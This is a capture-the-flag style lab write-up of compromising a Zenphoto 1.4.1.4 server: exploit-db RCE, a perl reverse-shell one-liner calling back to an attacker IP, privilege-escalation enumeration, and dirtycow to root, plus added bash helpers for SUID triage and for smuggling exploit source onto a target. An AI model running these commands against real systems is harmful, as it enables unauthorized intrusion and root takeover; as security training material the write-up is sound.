## Enumeration
- MySQL - 3006
  - ?? (unauthorized??)
- CUPS 1.4 - 23 ??
- SSH - 22
### Webserver - 80 HTTP
Paths
| Path | Note |
| ------- | --------------------------------------- |
| /test/ | Some gallery page (powered by zenphoto) |
| /index/ | leads to front page |
#### Zenphoto
https://www.zenphoto.org/
> Simple website CMS
Most recent version:
![[Pasted image 20250324162816.png]]
Searchsploit reveals plenty of options here
Source code inspection reveals:
![[Pasted image 20250324163026.png]]
## Initial Access
The page source gives the version (1.4.1.4), which straight up matches an RCE [CVE](https://nvd.nist.gov/vuln/detail/CVE-2011-4825):
```sh
searchsploit zenphoto
...
ZenPhoto 1.4.1.4 - 'ajax_create_folder.php' Remote Code Execution | php/webapps/18083.php
...
searchsploit -m 18083.php
```
CVE description:
> Static code injection vulnerability in inc/function.base.php in Ajax File and Image Manager before 1.1, as used in tinymce before 1.4.2, phpMyFAQ 2.6 before 2.6.19 and 2.7 before 2.7.1, and possibly other products, allows remote attackers to inject arbitrary PHP code into data.php via crafted parameters

The description names Ajax File and Image Manager rather than Zenphoto because Zenphoto 1.4.1.4 bundles that component inside its TinyMCE plugin; its `ajax_create_folder.php` is what the searchsploit entry targets.
Execution:
```sh
php 18083.php $RHOST /test/
```
This drops us into the exploit's own limited shell (the `zenphoto-shell#` prompt seen below), not a proper reverse shell.
We can `cat /home/local.txt` for an initial flag; this took about 30 minutes.
## Foothold
Due to the limited functionality of the exploit shell I'll be looking to upgrade it:
- no netcat available
- we can execute `.sh` scripts
- no success with bash `/dev/tcp` reverse shells
- we can run `bash` though
- we can run `wget`, but it crashes the exploit shell and leaves the file empty
- all of this suggests we may have to do the privesc enumeration by hand from this shell
This turns out to work just fine (the perl one-liner is run from the exploit shell and connects back to the attacker box on 192.168.45.231:3006; the two lines after it are typed into the caught shell to get a usable pty):
```sh
# from the exploit shell: perl reverse shell back to the listener
perl -e 'use Socket;$i="192.168.45.231";$p=3006;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'
# in the caught shell: upgrade to a pty
python -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
```
## Privesc
- no output from `sudo -l`
- kernel version: `2.6.32-21-generic`
  - could be vulnerable to [this](https://www.exploit-db.com/exploits/14814)
- `gcc` is available
  - but we still can't get files onto the box
- `ps aux`
  - no interesting procs sticking out
  - no passwords as command line args
- nothing in `crontab -l`
- users
  - `saned`
    - has a home directory
    - possibly an SSH login
- writable files: `find / -type f -writable 2>/dev/null`
  - `/usr/bin/changeip` (??) - writable, but not SUID and not in `sudo -l`, so editing it only pays off if root actually runs it, which nothing found so far suggests
  - a bunch of `/proc` entries
```
zenphoto-shell# cat /usr/bin/changeip
#!/bin/bash
cat /etc/network/interfaces |egrep -v "address|netmask|gateway|nameservers" > /tmp/ip
echo address $1 >> /tmp/ip
echo netmask $2 >> /tmp/ip
mv -f /tmp/ip /etc/network/interfaces
/etc/init.d/networking restart
echo 127.0.0.1 localhost > /etc/hosts
echo $1 $3 >>/etc/hosts
history -c
```
- Looking for binaries with SUID bit set
```
zenphoto-shell# find / -perm -4000 -type f 2>/dev/null
/bin/ping6
/bin/umount
/bin/mount
/bin/fusermount
/bin/su
/bin/ping
/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/sudo
/usr/bin/gpasswd
/usr/bin/lppasswd
/usr/bin/chfn
/usr/bin/mtr
/usr/bin/X
/usr/bin/sudoedit
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/arping
/usr/bin/at
/usr/bin/chsh
/usr/bin/traceroute6.iputils
/usr/bin/pkexec
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/pt_chown
/usr/sbin/pppd
/usr/sbin/uuidd
```
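An added example, not from the writeup, with two helpers for the privesc enumeration above: a kernel version-range check for dirtycow (CVE-2016-5195) of the kind linpeas performs, and a SUID triage that filters `find / -perm -4000` output against a stock allow-list so only the non-standard binaries are left to research. The allow-list is my own assumption for an Ubuntu 10.04-era box, not an authoritative baseline, and the sample SUID input is the listing from this page.

```shell
#!/usr/bin/env bash
# Added example, not from the writeup: triage helpers for the privesc checks.

# kernel_in_dirtycow_range UNAME_R
# Returns 0 when the bare version lies in the publicly reported dirtycow
# (CVE-2016-5195) window 2.6.22 <= v < 4.8.3, else 1.
# Caveat: distros backport fixes without bumping the version, and the 4.4.x
# and 4.7.x stable branches were fixed below 4.8.3, so a hit means "try the
# PoC", not "vulnerable".
kernel_in_dirtycow_range() {
    local v="${1%%-*}"                     # "2.6.32-21-generic" -> "2.6.32"
    local a b c rest
    IFS=. read -r a b c rest <<<"$v"
    : "${c:=0}"
    local n=$((a * 1000000 + b * 1000 + c))
    local lo=$((2 * 1000000 + 6 * 1000 + 22))
    local hi=$((4 * 1000000 + 8 * 1000 + 3))
    if [ "$n" -ge "$lo" ] && [ "$n" -lt "$hi" ]; then
        return 0
    fi
    return 1
}

# suid_triage
# Reads SUID paths on stdin and prints only those absent from the allow-list.
# The allow-list is an assumed stock-Ubuntu set; extend it for your baseline.
suid_triage() {
    local stock=' /bin/ping6 /bin/umount /bin/mount /bin/fusermount /bin/su /bin/ping
 /lib/dbus-1.0/dbus-daemon-launch-helper /usr/bin/sudo /usr/bin/gpasswd /usr/bin/chfn
 /usr/bin/sudoedit /usr/bin/newgrp /usr/bin/passwd /usr/bin/arping /usr/bin/at
 /usr/bin/chsh /usr/bin/traceroute6.iputils /usr/bin/pkexec /usr/lib/eject/dmcrypt-get-device
 /usr/lib/policykit-1/polkit-agent-helper-1 /usr/lib/openssh/ssh-keysign /usr/lib/pt_chown
 /usr/sbin/uuidd '
    local path
    while read -r path; do
        [ -z "$path" ] && continue
        case "$stock" in
            *[[:space:]]"$path"[[:space:]]*) ;;   # stock binary, skip
            *) printf '%s\n' "$path" ;;          # unusual, go research it
        esac
    done
}

# demo_suid_triage: runs the triage over the SUID listing from this writeup
# (constructed sample input, embedded so the example runs offline).
demo_suid_triage() {
    suid_triage <<'EOF'
/bin/ping6
/bin/umount
/bin/mount
/bin/fusermount
/bin/su
/bin/ping
/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/sudo
/usr/bin/gpasswd
/usr/bin/lppasswd
/usr/bin/chfn
/usr/bin/mtr
/usr/bin/X
/usr/bin/sudoedit
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/arping
/usr/bin/at
/usr/bin/chsh
/usr/bin/traceroute6.iputils
/usr/bin/pkexec
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/pt_chown
/usr/sbin/pppd
/usr/sbin/uuidd
EOF
}

# Usage on a target: kernel_in_dirtycow_range "$(uname -r)" && echo "try dirtycow"
#                    find / -perm -4000 -type f 2>/dev/null | suid_triage
```

On this box the triage leaves `lppasswd`, `mtr`, `X`, the two vmware wrappers and `pppd`; that is a research list, not a vulnerability list, and the kernel check fires for `2.6.32-21-generic` only as a prompt to actually run the PoC.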
### Kernel Exploit
Running `linpeas.sh` reveals a high likelihood that the system is vulnerable to [dirtycow](https://github.com/firefart/dirtycow) (CVE-2016-5195; the 2.6.32 kernel sits inside its affected range).
We deploy it to the system, compile it, execute it and get root.
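An added example (neither the writeup's nor firefart's code) covering the gap between "deploy it" and "compile it": when `wget` kills the web shell and there is no netcat, as in the Foothold section, the source can be pasted into the interactive shell as a quoted heredoc of base64. `stage_as_heredoc` runs on the attacker box and prints the snippet to paste; the file names are placeholders.

```shell
#!/usr/bin/env bash
# Added example, not from the writeup: move a file onto a target that has an
# interactive shell and base64 but no working wget/nc, then the firefart
# build/run lines once dirty.c is over there.

# stage_as_heredoc LOCAL_FILE REMOTE_PATH
# Emits a shell snippet for pasting into the target shell. It rebuilds the
# file byte-for-byte from a quoted heredoc and prints its cksum so the
# result can be compared with the expected value in the first line.
stage_as_heredoc() {
    local src="$1" dst="$2"
    printf '# expected cksum: %s\n' "$(cksum < "$src" | cut -d' ' -f1,2)"
    printf "base64 -d > '%s' <<'__EOF_B64__'\n" "$dst"
    base64 "$src"                    # line-wrapped; base64 -d ignores newlines
    printf '__EOF_B64__\n'
    printf "cksum < '%s'\n" "$dst"
}

# Usage on the attacker box (paths are placeholders):
#   stage_as_heredoc dirty.c /tmp/dirty.c > paste_me.txt
# Then paste paste_me.txt into the target shell and compare the two cksums.
#
# On the target, per the firefart README (not shown in the writeup):
#   gcc -pthread dirty.c -o dirty -lcrypt
#   ./dirty <new-password>      # adds a root user "firefart" to /etc/passwd
#   su firefart
# The PoC backs up /etc/passwd to /tmp/passwd.bak; restore it when done.
```

If `base64` is missing on the target, perl was already proven to be there by the reverse shell, so `perl -MMIME::Base64 -ne 'print decode_base64($_)'` can replace `base64 -d` in the emitted snippet. The race in dirtycow can wedge an old kernel, so only run it on a box you are allowed to crash and restore `/etc/passwd` from the backup afterwards.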
## Lessons Learned
- Took a hint concerning the reverse shell. Should have kept on trying reverse shells; the perl reverse shell would eventually have worked.
- Got exhausted and took a hint. Quickly learned that we were dealing with a vulnerable kernel version. Deployed firefart and got root. Overthought this one... again.
- Got the initial access in like 15 minutes.